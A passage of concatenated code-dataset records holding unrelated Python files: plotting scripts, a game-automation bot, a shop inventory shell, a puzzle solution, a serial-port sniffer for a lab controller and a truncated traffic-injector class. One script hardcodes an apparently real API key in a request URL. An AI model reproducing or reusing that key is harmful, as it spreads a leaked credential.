consistent\nplt.tight_layout()\n\n# actually show the plot on the screen\nplt.show()\n\n# close the opened connection\nconn.close()","sub_path":"Data_graph_pandas_subPlots.py","file_name":"Data_graph_pandas_subPlots.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"58424283","text":"import pyautogui\nimport time\nimport re\nimport sys\nimport os\nimport operator\n\nfrom actors.ActorTemplate import ActorTemplate\nfrom actors.utilities.save_helper.MagicQuarterSaveHelper import MagicQuarterSaveHelper\n\nclass MagicQuarter2(ActorTemplate):\n\n # Initializing Object\n def __init__(self, bot):\n super(MagicQuarter2, self).__init__(bot)\n self.game_bot = bot\n self.save_helper = MagicQuarterSaveHelper(bot)\n self.magic_quarter_regions = bot.screenshot_data.data[\"magic_quarter\"]\n\n self.battle_screen = bot.data[\"battle\"]\n self.town_screen = bot.data[\"town\"]\n self.magic_screen = bot.data[\"magic_quarter\"]\n\n self.points = {\n \"upgrade\": {\"x\": 1230, \"y\": 810},\n \"close\": {\"x\": 1840, \"y\": 50},\n }\n \n def runMagicQuarterCheck(self):\n pyautogui.press('g')\n time.sleep(0.5)\n in_menu = self.menuCheck(\"MagicQuarter\", self.game_bot)\n if in_menu:\n self.game_bot.click(self.points[\"upgrade\"])\n time.sleep(0.5)\n self.game_bot.click(self.points[\"close\"])\n time.sleep(0.5)\n else:\n print(\"Did not find Magic quarter menu\")\n \n def startDuties(self):\n self.loadData()\n instructions = self.instructions\n coordinates = self.coordinates\n needs_visit = instructions[\"magic_quarter\"][\"needs_upgrade\"]\n\n if needs_visit:\n self.enterMagicQuarterZone()\n time.sleep(1)\n self.processMagicQuarterQueue()\n self.returnToBattleScreen()\n\n def enterMagicQuarterZone(self):\n bot = self.game_bot\n\n bot.click(self.battle_screen[\"icons\"][\"town\"])\n bot.click(self.town_screen[\"icons\"][\"magic_quarter\"])\n\n def processMagicQuarterQueue(self):\n bot = self.game_bot\n screenshot_helper = bot.screenshot_helper\n instructions = self.instructions[\"magic_quarter\"]\n coordinates = self.coordinates\n server = instructions[\"server\"]\n\n guardian_slot = instructions[\"upgrade_info\"][\"guardian_slot\"]\n 
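# Added annotation (assumption): guardian_slot is a key of the coordinates dict built by loadData(), mapping the configured slot label to an {x, y} screen point accepted by bot.click().\n 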
guardian_point = coordinates[guardian_slot]\n train_point = coordinates[\"train\"]\n magic_timer = self.magic_quarter_regions[\"magic_quarter_timer\"]\n\n bot.click(guardian_point)\n time_for_upgrade = screenshot_helper.getScreenshotTime(magic_timer)\n bot.click(train_point)\n\n data = {\n \"time_for_upgrade\": str(time_for_upgrade)\n }\n self.saveProgress(data)\n\n def returnToBattleScreen(self):\n bot = self.game_bot\n coordinates = self.coordinates\n\n bot.click(coordinates[\"x_icon\"])\n bot.click(coordinates[\"x_icon\"])\n","sub_path":"Firestone V2/actors/magic_quarter/MagicQuarter2.py","file_name":"MagicQuarter2.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"508041864","text":"\r\n\r\nimport shutil\r\n\r\n\r\npath_to_structures = 'C:/ShareSSD/scop/structures/'\r\nnew_path = 'C:/ShareSSD/scop/_send/'\r\n\r\nwith open('C:/ShareSSD/scop/auxi', 'r') as fp:\r\n\r\n line = fp.readline()\r\n while line:\r\n\r\n structure = str(line).strip().split()[0].split('/')[-1]\r\n\r\n shutil.copy(path_to_structures+structure, new_path+structure)\r\n\r\n line = fp.readline()\r\n","sub_path":"ResultsManagement/IsolateFiles.py","file_name":"IsolateFiles.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"189975711","text":"caffe_dir = 'caffe/' #path to your caffe directory\npycaffe_dir = caffe_dir + 'python/' #path to your pycaffe directory\n\nfeature_dir = 'lexical_features/' #path to store extracted features\ncoco_annotations = 'annotations/' #download these annotations from the MSCOCO site\ncoco_images_root = 'coco_images/' #download these images from MSCOCO site\nimagenet_images_root = 'dcc_imagenet/' #subset of imagenet dataset collected for DCC\ncoco_caption_eval = 'coco-caption-eval/' #eval tools from MSCOCO site\ncaption_weights_root = 'snapshots/' #wherever you store your snapshots\npretrained_lm = 'snapshots/'\nmodels_root = 'snapshots/'\nvocab_root = 'utils/vocabulary/'\n","sub_path":"utils/config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72735868","text":"'''\nImplements a Python Command Shell version of the\nFashion Shop application\n'''\n\nfrom ShellUI.BTCInput import *\n\nfrom Storage.StockItem import StockItem\n\nclass FashionShopShell:\n '''\n Provides a Command Shell interface for use by\n the Fashion Shop application\n '''\n\n def __init__(self, filename, storage_class):\n '''\n Manages the fashion shop data\n Displays a message if the load fails and creates a new shop\n '''\n FashionShopShell.__filename = filename\n try:\n self.__shop = storage_class.load(filename)\n except:\n print('Fashion shop not loaded.')\n print('Creating an empty fashion shop')\n self.__shop = storage_class()\n\n def create_new_stock_item(self):\n '''\n Creates a new stock item. 
Gets the details of the item, \n creates it and then stores it in the shop\n '''\n\n stock_ref = read_text('Enter stock reference: ')\n price = read_float_ranged(prompt='Enter price: ',\n min_value=StockItem.min_price,\n max_value=StockItem.max_price)\n tag_string = read_text('Enter tags (separated by commas): ')\n\n tags = StockItem.get_tag_set_from_text(tag_string)\n\n new_item = StockItem(stock_ref=stock_ref, price=price, tags=tags)\n\n try:\n self.__shop.store_new_stock_item(new_item)\n print('Item stored')\n except Exception as e:\n print('Item not stored ')\n print(e)\n\n def add_stock(self):\n '''\n Adds stock to an existing stock item\n Searches for the item first, and then gets the \n number of stock items to add\n '''\n print('Add stock')\n\n item_stock_ref = read_text('Enter the stock reference: ')\n\n item = self.__shop.find_stock_item(item_stock_ref)\n \n if item == None:\n print('This stock item was not found')\n return\n\n print(item)\n\n number_to_add = read_int_ranged('Number to add (0 to abandon): ',\n 0, StockItem.max_stock_add)\n\n if number_to_add == 0:\n print('No items added')\n else:\n item.add_stock(number_to_add)\n print(item)\n\n def sell_stock(self):\n '''\n Sells stock. Searches for the item and then reads the\n number of items that are being sold.\n Will not allow more items to be sold than are in stock\n '''\n print('Sell item')\n\n item_stock_ref = read_text('Enter the stock reference: ')\n\n item = self.__shop.find_stock_item(item_stock_ref)\n\n if item == None:\n print('This item was not found')\n return\n\n print('Selling')\n print(item)\n\n if item.stock_level == 0:\n print('There are none in stock')\n return\n\n number_sold = read_int_ranged('How many sold (0 to abandon): ',\n 0,\n item.stock_level)\n\n if number_sold == 0:\n print('Sell item abandoned')\n return\n\n item.sell_stock(number_sold)\n\n print('Items sold')\n\n def do_report(self):\n print('Stock report')\n print(self.__shop)\n\n def do_tag_filter(self):\n print('Filter on tags')\n tag_string = read_text('Enter the tags to look for (separated by commas): ')\n search_tags = StockItem.get_tag_set_from_text(tag_string)\n items = self.__shop.find_matching_with_tags(search_tags)\n stock = map(str,items)\n stock_list = '\\n'.join(stock)\n template = '''Matching items\n\n{0}\n'''\n print(template.format(stock_list))\n\n def main_menu(self):\n\n prompt = '''Mary's Fashion Shop\n\n1: Create new stock item\n2: Add stock to existing item\n3: Sell stock\n4: Stock report\n5: Find on tags\n6: Exit\n\nEnter your command: '''\n\n while(True):\n command = read_int_ranged(prompt, 1, 6)\n if command == 1:\n self.create_new_stock_item()\n elif command == 2:\n self.add_stock()\n elif command == 3:\n self.sell_stock()\n elif command == 4:\n self.do_report()\n elif command == 5:\n self.do_tag_filter()\n elif command == 6:\n self.__shop.save(FashionShopShell.__filename)\n print('Shop data saved')\n break\n","sub_path":"12. 
Python applications/EG12-10 TestFashionShopApp Doc/ShellUI/FashionShopShell.py","file_name":"FashionShopShell.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"428557188","text":"import pandas as pd\r\nimport requests\r\nimport json\r\n\r\ndf = pd.read_excel('Tickers.xlsx')\r\nCompanies = pd.DataFrame()\r\n\r\nfor i in df['Ticker names']:\r\n apiPath = 'https://financialmodelingprep.com/api/v3/ratios/'+str(i)+'?apikey=68aff3a70cc7e28159a88646ab58c6d0'\r\n finInfo = requests.get(apiPath)\r\n if(finInfo.json()):\r\n print(finInfo.json())\r\n data = finInfo.json()[0]\r\n print(data)\r\n Companies = Companies.append(pd.json_normalize(data), ignore_index = True)\r\n\r\n\r\nprint(Companies)\r\nwriter = pd.ExcelWriter('FinRatios.xlsx')\r\nCompanies.to_excel(writer,'CompanyInfo')\r\nwriter.save()","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481397538","text":"import os\nimport collections\n\n\ndef bfs(graph, start, end):\n queue = collections.deque()\n visited = set()\n distance = {}\n\n distance[start] = 0\n visited.add(start)\n queue.append(start)\n while (queue):\n current = queue.popleft()\n if current == end:\n return distance[current]\n\n for child in graph[current]:\n if child not in visited:\n distance[child] = distance[current] + 1\n queue.append(child)\n visited.add(child)\n\n raise Exception('NOT FOUND')\n\n\nfilepath = f'{os.getcwd()}/Q6/input.txt'\nwith open(filepath, 'r') as f:\n data = f.read().splitlines()\n\n# build graph\nYOU, SANTA = None, None\ngraph = {}\nfor orbit in data:\n a, b = orbit.split(')')\n # init child arrays if needed\n if a not in graph:\n graph[a] = []\n if b not in graph:\n graph[b] = []\n\n # add children\n graph[a].append(b)\n graph[b].append(a)\n\n # track our starting locations\n if b == 'YOU':\n YOU = a\n if b == 'SAN':\n SANTA = a\n\ndistance = bfs(graph, YOU, SANTA)\n\nprint(distance)\n","sub_path":"Q6/Q6P2.py","file_name":"Q6P2.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"606450445","text":"posActuelle = int(input())\r\nnbVillages = int(input())\r\nnbAccessibles = 0\r\nfor loop in range(nbVillages):\r\n posVillage = int(input())\r\n ecart = posActuelle - posVillage\r\n if ecart < 0:\r\n ecart = -ecart\r\n if ecart <= 50:\r\n nbAccessibles = nbAccessibles + 1\r\nprint(nbAccessibles)","sub_path":"France_ioi/Level 1/Chapitre 6/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388612998","text":"import read_data as rd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport argparse\nimport dip_func as df\nfrom mdt_calculations.plotting import geo_plot_w_subplots as gp\nfrom PIL import Image\nfrom skimage.transform import resize\nfrom scipy.interpolate import make_interp_spline\nfrom matplotlib.patches import Circle\nfrom skimage.metrics import peak_signal_noise_ratio\nfrom skimage.metrics import structural_similarity as ssim\n\n\ndef plot_from_coord(arr, coord, window=20, vmin=0, vmax=1.4):\n fig, ax = plt.subplots()\n ax.imshow(arr[coord[0]-window:coord[0]+window, coord[1]-window:coord[1]+window], vmin=vmin, vmax=vmax, cmap='turbo')\n circ = 
Circle((window, window), 5, fill=False) # mark the crop centre; the original absolute coord and radius 50 fell outside the cropped axes\n ax.add_patch(circ)\n plt.show()\n\n\ndef compute_std_from_coords(arrs, coords, window=3):\n std_coords = []\n for coord in coords:\n coords_across_arrs = []\n for arr in arrs:\n coords_across_arrs.append(arr[coord[0]-window:coord[0]+window, coord[1]-window:coord[1]+window])\n std_coords.append(np.std(coords_across_arrs))\n return std_coords\n\n\ndef compute_std_across_arrs(arrs):\n arr_stack = np.stack(arrs)\n return np.std(arr_stack, axis=0)\n\n\ndef compute_psnr_against_reference_coords(arrs, reference, coords, window=5):\n errors = []\n for arr in arrs:\n ref_windows = []\n pred_windows = []\n for coord in coords:\n ref_windows.append(reference[coord[0]:coord[0]+window, coord[1]:coord[1]+window])\n pred_windows.append(arr[coord[0]:coord[0]+window, coord[1]:coord[1]+window])\n ref_window_arr = np.stack(ref_windows)\n pred_window_arr = np.stack(pred_windows)\n error = peak_signal_noise_ratio(ref_window_arr, pred_window_arr, data_range=10)\n errors.append((error))\n return np.array(errors)\n\n\ndef compute_ssim_against_reference_coords(arrs, reference, coords, window=7):\n errors = []\n for arr in arrs:\n ssims = []\n for coord in coords:\n ref_window = reference[coord[0]:coord[0]+window, coord[1]:coord[1]+window]\n pred_window = arr[coord[0]:coord[0]+window, coord[1]:coord[1]+window]\n ssim_val = ssim(ref_window, pred_window, data_range=10, win_size=min(7, window))\n ssims.append(ssim_val)\n error = np.mean(ssims)\n errors.append(error)\n return np.array(errors)\n\n\ndef compute_errors_against_reference(arrs, reference):\n errors = []\n for arr in arrs:\n error = np.mean((arr - reference) ** 2)\n errors.append(error)\n return np.array(errors)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--iterations\", type=int, default=2000, help=\"number of iterations\")\nparser.add_argument(\"-k\", \"--kernel_size\", type=int, default=0, help=\"kernel size for mean reg\")\nparser.add_argument(\"-r\", \"--run_number\", type=int, default=5, help=\"chosen run number\")\nparser.add_argument(\"-l1\", \"--lambda_mean_reg\", type=float, default=0.0, help=\"strength of mean reg\")\nparser.add_argument(\"--model_key\", type=str, default=\"DIP\", help=\"name of model\")\nparser.add_argument(\"--region\", type=str, default=\"global\", help=\"region size on which model was trained\")\nparser.add_argument(\"--mdt_filename\", type=str, default=\"dtu18_gtim5_do0280_rr0004.dat\", help=\"name of mdt to denoise\")\nparser.add_argument(\"--from_checkpoint\", dest=\"from_checkpoint\", action=\"store_true\", help=\"train from last save\")\nparser.add_argument(\"-re\", \"--region_extent\", type=str, default=\"global\", help=\"region extent of plot\")\nparser.add_argument(\"-p\", \"--product\", type=str, default=\"mdt\", help=\"product type of plot: mdt or cs\")\nparser.add_argument(\"--log\", dest=\"log\", action=\"store_true\", help=\"log scale\")\nargs = parser.parse_args()\n\nnum_iter = args.iterations\nrun_number = args.run_number\nk = args.kernel_size\nregion = args.region\nmodel_key = args.model_key\nlambda_mean_reg = args.lambda_mean_reg\nregion_extent = args.region_extent\nproduct = args.product\nlog = args.log\nfilepath = os.path.join('data', args.mdt_filename)\n\n# modify me when/if new params are added\nparam_string = f\"region={region}-k={k}-l1={lambda_mean_reg}\"\n# save format = modelname / region&kernel / mdtname\nsave_dir = os.path.join('./results', model_key, region, param_string, args.mdt_filename[:-4])\nsave_dir = os.path.join(save_dir, 
str(run_number))\n\ncentral_lon = 0\nbds = {'mdt': [-1.4, 1.4], 'cs': [0, 1.4]}\nvmin, vmax = bds[product]\nnum_iters = np.arange(100, 4400, 100)\n\nlist_dict = []\narr_of_dips = []\nfor num_iter in num_iters:\n if product == 'cs':\n arr_of_dips.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}_cs_band20.dat',\n os.path.join(save_dir, 'currents')))))\n elif product == 'mdt':\n arr_of_dips.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}.dat', os.path.join(save_dir, 'dats')))))\n dict_item = {'extent': f'{region_extent}', 'product': f'{product}', 'log': log}\n list_dict.append(dict_item)\n\niteration_figsize = (17, 10)\nstandard_figsize = (16, 16)\nxlabels = ['(a)', '(b)', '(c)', '(d)', '(e)', '(f)', '(g)', '(h)']\nxlabels = [str(item) for item in num_iters]\n\nprod_dict = {'cs': ['cs', 'currents', '_cs_band10'], 'mdt': ['mdt', 'mdts', '']}\nif product == 'cs':\n cls_name = 'cls18'\nelse:\n cls_name = 'cls18_rr0004'\ncls18 = np.rot90(rd.read_surface(f'{cls_name}{prod_dict[product][2]}.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}'))\nnemo = np.rot90(rd.read_surface(f'orca0083_mdt_12th{prod_dict[product][2]}.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}'))\n\nplot_reference = False\nif plot_reference:\n gp.plot(cls18, product=f'{prod_dict[product][0]}', vmin=vmin, vmax=vmax, central_lon=180)\n gp.plot(nemo, product=f'{prod_dict[product][0]}', vmin=vmin, vmax=vmax, central_lon=180)\ncls18_res4 = resize(cls18, (720, 1440), order=2)\nnemo_res4 = resize(nemo, (720, 1440), order=2)\n\nplot_original = False\norig_mdt = np.rot90(rd.read_surface(f'dtu18_gtim5_do0280_rr0004{prod_dict[product][2]}.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}'))\nif plot_original:\n gp.plot(np.rot90(orig_mdt), product=f'{prod_dict[product][0]}', vmin=0, vmax=2, central_lon=180)\n\nplot_iterations_psnr = False\nif plot_iterations_psnr:\n coords = [(229, 1131), (248, 1120), (263, 1090), (250, 1167), (576, 1260), (40, 260), (600, 540)]\n cls_errors = compute_psnr_against_reference_coords(arr_of_dips, cls18_res4, coords, window=5)\n nemo_errors = compute_psnr_against_reference_coords(arr_of_dips, nemo_res4, coords, window=5)\n avg_errors = (cls_errors + nemo_errors)/2\n\n cls_glb_errors = compute_errors_against_reference(arr_of_dips, cls18_res4)\n nemo_glb_errors = compute_errors_against_reference(arr_of_dips, nemo_res4)\n\n num_iters_spline = np.linspace(num_iters.min(), num_iters.max(), 150)\n cls_errors_spline = make_interp_spline(num_iters, cls_errors)\n cls_errors_spline = cls_errors_spline(num_iters_spline)\n nemo_errors_spline = make_interp_spline(num_iters, nemo_errors)\n nemo_errors_spline = nemo_errors_spline(num_iters_spline)\n avg_errors = make_interp_spline(num_iters, avg_errors)\n avg_errors = avg_errors(num_iters_spline)\n fig, ax = plt.subplots(1, 1)\n ax.plot(num_iters_spline, cls_errors_spline, linestyle='--', label='CNES-CLS18 Error', linewidth=1)\n ax.plot(num_iters_spline, nemo_errors_spline, linestyle='--', label='NEMO Error', linewidth=1)\n ax.plot(num_iters_spline, avg_errors, label='Average Error', linewidth=1)\n ax.axvline(x=800, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.axvline(x=3200, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.set_xlabel('Iterations')\n ax.set_ylabel('PSNR')\n ax.set_xlim([0, 4400])\n ax.grid()\n ax.legend()\n plt.show()\n\nplot_iterations_ssim = False\nif plot_iterations_ssim:\n coords = [(229, 1131), (248, 1120), (263, 1090), (250, 1167), (576, 1260), (40, 260), (600, 540)]\n cls_errors = 
compute_ssim_against_reference_coords(arr_of_dips, cls18_res4, coords, window=3)\n nemo_errors = compute_ssim_against_reference_coords(arr_of_dips, nemo_res4, coords, window=3)\n avg_errors = (cls_errors + nemo_errors)/2\n\n cls_glb_errors = compute_errors_against_reference(arr_of_dips, cls18_res4)\n nemo_glb_errors = compute_errors_against_reference(arr_of_dips, nemo_res4)\n\n num_iters_spline = np.linspace(num_iters.min(), num_iters.max(), 150)\n cls_errors_spline = make_interp_spline(num_iters, cls_errors)\n cls_errors_spline = cls_errors_spline(num_iters_spline)\n nemo_errors_spline = make_interp_spline(num_iters, nemo_errors)\n nemo_errors_spline = nemo_errors_spline(num_iters_spline)\n avg_errors = make_interp_spline(num_iters, avg_errors)\n avg_errors = avg_errors(num_iters_spline)\n fig, ax = plt.subplots(1, 1)\n ax.plot(num_iters_spline, cls_errors_spline, linestyle='--', label='CNES-CLS18 Error', linewidth=1)\n ax.plot(num_iters_spline, nemo_errors_spline, linestyle='--', label='NEMO Error', linewidth=1)\n ax.plot(num_iters_spline, avg_errors, label='Average Error', linewidth=1)\n ax.axvline(x=800, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.axvline(x=3200, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.set_xlabel('Iterations')\n ax.set_ylabel('SSIM')\n ax.set_xlim([0, 4400])\n ax.grid()\n ax.legend()\n plt.show()\n\n\ncoords_for_stds = [(238, 1120), (228, 540), (511, 99), (531, 1205), (263, 1090), (576, 1260)]\nstds_coords = compute_std_from_coords(arr_of_dips, coords_for_stds)\n# Plot to see where coordinate is\n# for coord in coords_for_stds:\n# plot_from_coord(arr_of_dips[17], coord)\nplot_std = False\nif plot_std:\n # get rid of cbar title for this\n std_arr_stack = compute_std_across_arrs(arr_of_dips[7:31])\n list_dicts_stds = [{'extent': 'gs_big', 'product': 'std'},\n {'extent': 'ku_big', 'product': 'std'},\n {'extent': 'ag', 'product': 'std'},\n {'extent': 'bm3', 'product': 'std'}]\n stds_labels = ['(a)', '(b)', '(c)', '(d)']\n gp.geo_subplots([std_arr_stack, std_arr_stack, std_arr_stack, std_arr_stack],\n list_dicts_stds, 2, 2, vmin=0, vmax=0.4,\n figsize=iteration_figsize, xlabels=stds_labels, ticksize=10)\n\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='gs_big')\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='ku_big')\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='bm')\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='ag')\n\n# Residual plot\n# gp.plot((arr_of_dips[21]-arr_of_dips[17]), product=f'{prod_dict[product][0]}', vmin=0, vmax=0.5, central_lon=180, cmap='viridis')\n\n# Average over less iterations\n# gp.plot(np.mean(arr_of_dips[16:22], axis=0), product=f'{prod_dict[product][0]}', vmin=0, vmax=2, central_lon=180)\n\n\nnum_iters_window_plot = np.arange(200, 4400, 400)\nnum_iters_window_plot = np.array([100, 200, 400, 800, 1200, 1600, 2000, 2400, 2800, 3200, 3600, 4000])\nlist_dict_window_plot = []\narr_dips_window = []\nxlabels_window = [str(item) for item in num_iters_window_plot]\nfor num_iter in num_iters_window_plot:\n if product == 'cs':\n arr_dips_window.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}_cs_band20.dat',\n os.path.join(save_dir, 'currents')))))\n elif product == 'mdt':\n arr_dips_window.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}.dat', os.path.join(save_dir, 'dats')))))\n dict_item = {'extent': f'{region_extent}', 'product': f'{product}', 'log': log}\n 
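# Added annotation: one options dict per snapshot, so the subplot helper gp.geo_subplots (assumed to read 'extent'/'product'/'log' per panel) styles each panel from its matching entry.\n 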
list_dict_window_plot.append(dict_item)\n\nplot_snapshot_over_iterations = False\nif plot_snapshot_over_iterations:\n gp.geo_subplots(arr_dips_window, list_dict_window_plot, 3, 4, vmin=vmin, vmax=vmax, figsize=iteration_figsize, cbarlabelsize=14,\n ticksize=12, xlabels=xlabels_window)\n\nplot_snapshot = False\nlist_dicts_snapshot = [{'extent': 'gs', 'product': 'cs'},\n {'extent': 'ku', 'product': 'cs'},\n {'extent': 'ag', 'product': 'cs'},\n {'extent': 'bm', 'product': 'cs'}]\nsnapshot_labels = ['(a)', '(b)', '(c)', '(d)']\nif plot_snapshot:\n coords = [(103, 32), (-45, 32), (-155, -35), (121, -43), (-50, -40), (-108, -36), (116, 28), (-40, 25)]\n # gp.plot(arr_of_dips[15], product=product, vmin=vmin, vmax=vmax, extent='global', markers=coords)\n # gp.geo_subplots([arr_of_dips[15], arr_of_dips[15], arr_of_dips[15], arr_of_dips[15]],\n # list_dicts_snapshot, 2, 2, vmin=vmin, vmax=vmax,\n # figsize=iteration_figsize, xlabels=snapshot_labels)\n gp.polar_plot(arr_of_dips[15], product=product, vmin=vmin, vmax=vmax)\n\nplot_avg = True\navg_iterations = np.mean(arr_of_dips[14:19], axis=0)\nif plot_avg:\n gp.plot(avg_iterations, product=product, vmin=vmin, vmax=vmax, extent='global')\n gp.polar_plot(avg_iterations, product=product, vmin=vmin, vmax=vmax)\n\nif product == 'cs':\n gauss_mdt = np.rot90(rd.read_surface('dtu18_GTIM_R5_do0280_rr0004_100k_cs.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}/gauss_filtered_mdts_cs/geodetic'))\nelse:\n gauss_mdt = np.rot90(rd.read_surface('dtu18_GTIM5_R6e_do0280_rr0004_100k.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}/gauss_filtered_mdts'))\nplot_gaussian = False\nif plot_gaussian:\n gp.plot(gauss_mdt, product=product, vmin=vmin, vmax=vmax, extent='global')\n\nlist_dicts_residual = [{'extent': 'gs', 'product': 'mdt', 'vmin': vmin, 'vmax': vmax},\n {'extent': 'gs', 'product': 'mdt', 'vmin': vmin, 'vmax': vmax},\n {'extent': 'gs', 'product': 'residual', 'vmin': -0.5, 'vmax': 0.5}]\nresid_labels = ['(a)', '(b)', '(c)']\nplot_residual = False\nif plot_residual:\n gp.geo_subplots([orig_mdt, avg_iterations, orig_mdt-avg_iterations],\n list_dicts_residual, 1, 3, vmin=None, vmax=None,\n figsize=iteration_figsize, xlabels=resid_labels)\n\nplot_dip_gauss_residual = False\nif plot_dip_gauss_residual:\n gp.geo_subplots([avg_iterations, gauss_mdt, avg_iterations-gauss_mdt],\n list_dicts_residual, 1, 3, vmin=None, vmax=None,\n figsize=iteration_figsize, xlabels=resid_labels)\n\n# df.compute_currents_from_dat(f'../a_mdt_data/computations', 'dtu18_gtim5_do0280_rr0004')\n\n\nif product =='cs':\n pmf_mdt = np.flipud(np.rot90(rd.read_surface('fmdt_01_L280_55_cs_band20.dat',\n f'../MDT-Calculations/pmf_stuff/io/{prod_dict[product][1]}')))\nelse:\n pmf_mdt = np.flipud(np.rot90(rd.read_surface('fmdt_01_L280_82.dat',\n f'../MDT-Calculations/pmf_stuff/io/{prod_dict[product][1]}')))\n# pmf_mdt = resize(pmf_mdt, (720, 1440), order=2)\n\nplot_dip_pmf_residual = False\nif plot_dip_pmf_residual:\n gp.geo_subplots([avg_iterations, pmf_mdt, avg_iterations-pmf_mdt],\n list_dicts_residual, 1, 3, vmin=-0.7, vmax=0.7,\n figsize=iteration_figsize, xlabels=resid_labels)\n","sub_path":"plot_dip.py","file_name":"plot_dip.py","file_ext":"py","file_size_in_byte":15291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"147058555","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\n# thermo-fht6020.py\r\n\r\n# Simple sniffer script which prints on the screen the serial messages exchanged between a Thermo\r\n# 
Fisher Scientific FHT 6020 controller and a PC.\r\n\r\n# Python modules required: pyserial.\r\n# Tested with Python 2.7.12 and pyserial 3.4.\r\n\r\n# Necessary modules\r\n\r\nimport serial\r\nimport sys\r\n\r\n# Serial interface, configured as described in the FHT 6020 manual\r\n\r\ninterface = serial.Serial(port = \"/dev/ttyUSB0\",\r\n baudrate = 19200,\r\n bytesize = serial.SEVENBITS,\r\n parity = serial.PARITY_EVEN,\r\n stopbits = serial.STOPBITS_TWO)\r\n\r\n# Loop\r\n\r\nwhile (True):\r\n new_character = interface.read(1)\r\n if (new_character == \"\\x07\"):\r\n sys.stdout.write(\"\")\r\n elif (new_character == \"\\x03\"):\r\n sys.stdout.write(\"\\n\")\r\n elif (new_character == \"\\x15\"):\r\n sys.stdout.write(\"\\n\")\r\n elif (new_character == \"\\x06\"):\r\n sys.stdout.write(\"\\n\")\r\n else:\r\n sys.stdout.write(new_character)\r\n","sub_path":"thermo-fht6020.py","file_name":"thermo-fht6020.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"271674199","text":"# -*- coding: iso-8859-1 -*-\n#\n# $Id: NSInjector.py,v 1.7.2.5.2.7 2013/03/19 09:32:15 elorlpe Exp $\n#\n# Copyright (c) Ericsson España S.A., 2011.\n# All rights reserved.\n#\n# This product or document is proprietary to and embodies the\n# confidential technology of Ericsson España S.A.\n# Possession, use, duplication or distribution of this product\n# or document is authorized only pursuant to a valid written\n# license from Ericsson España S.A\n#\n\"\"\"\nAbstraction for handling a trafeIns injector. If there's an SSH connection associated \nto the object it will use it, or it will try to inject locally if there's no such\nassociation.\n\"\"\"\n\nimport logging\nimport os\nimport time\nimport sys\nimport traceback\nfrom NSTpyfw.injector import Injector\nfrom utils.oamCommands import OAMCommands\n\nclass NSInjector(Injector):\n \"\"\"\n Handles an NSinjector injector \n\n @ivar RETURN_CODE_VALUES: The available return codes when a trafrawio module is used:\n - SUCCESS: No errors\n - NOT_LOADED: The trafrawio module is not loaded yet.\n - READY: The trafrawio module is ready to be used.\n - ALREADY_EXISTS: The trafrawio module is already loaded.\n \"\"\"\n\n RETURN_CODE_VALUES = {\"SUCCESS\": 0, \"NOT_LOADED\": 1,\n \"READY\": 22, \"ALREADY_EXISTS\": 114}\n\n _SLEEPING_TIME = 1 # We keep asking the injector for \n _N_TRIES = 120 # _SLEEPING_TIME * _N_TRIES seconds.\n\n _QUERY_STATUS = \"ns config injector show status;\"\n _QUERY_LOADED = \"ns config injector;\"\n _UNLOAD_INJECTOR = \"ns module stop injector;\"\n _LOAD_INJECTOR = \"ns module start injector %s injector.mod;\"\n\n def __init__(self, run_files=1, partition=1, process_name=\"pmain\"):\n \"\"\"\n Init Injector\n\n\t@param partition: Partition where file will be injected (defaults to 1)\n\t@type partition: int\n\n\t@param run_files: If trace file is split into several parts, run_files is the\n\t\t\t number of parts to inject (defaults to 1)\n\t@type run_files: int\n \"\"\"\n super(NSInjector, self).__init__()\n \n self.partition = partition\n self.run_files = run_files\n self.process_name = process_name\n self.logger = logging.getLogger('NSTlogger')\n\n def set_cell_ip(self, cell_ip):\n self.cell_ip = cell_ip\n self.pool = self.cell_ip\n \n def _setup_sasn_env(self):\n self.run_injection_command('ns config vr set redun manual master id 1;',\n partition = 0)\n\n def _start_injector_module(self):\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n if 
